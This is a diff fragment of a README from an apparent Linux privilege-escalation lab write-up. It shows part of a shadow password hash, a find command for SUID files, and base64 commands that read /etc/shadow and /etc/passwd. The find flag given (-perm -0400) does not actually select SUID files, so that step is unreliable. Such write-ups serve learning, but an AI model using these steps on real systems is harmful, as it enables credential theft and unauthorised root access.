Spirizeon/LinuxPrivEsc-writeup/README.md

 $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLH
 ```
 ## Pirivlege escalation: SUID
+SUID is basically a file permission used to read/write/execute files as root, only a specific user has root access to the files
-Finding out packages with SUID set
++ Finding out packages with SUID set
 ```
 $ find / -type f -perm -0400 2> /dev/null
 ```
-we can use base64 out of the list
+we can use base64 because it has the SUID bit
 ```
 $ base64 /etc/shadow | base64 --decode
 $ base64 /etc/passwd | base64 --decode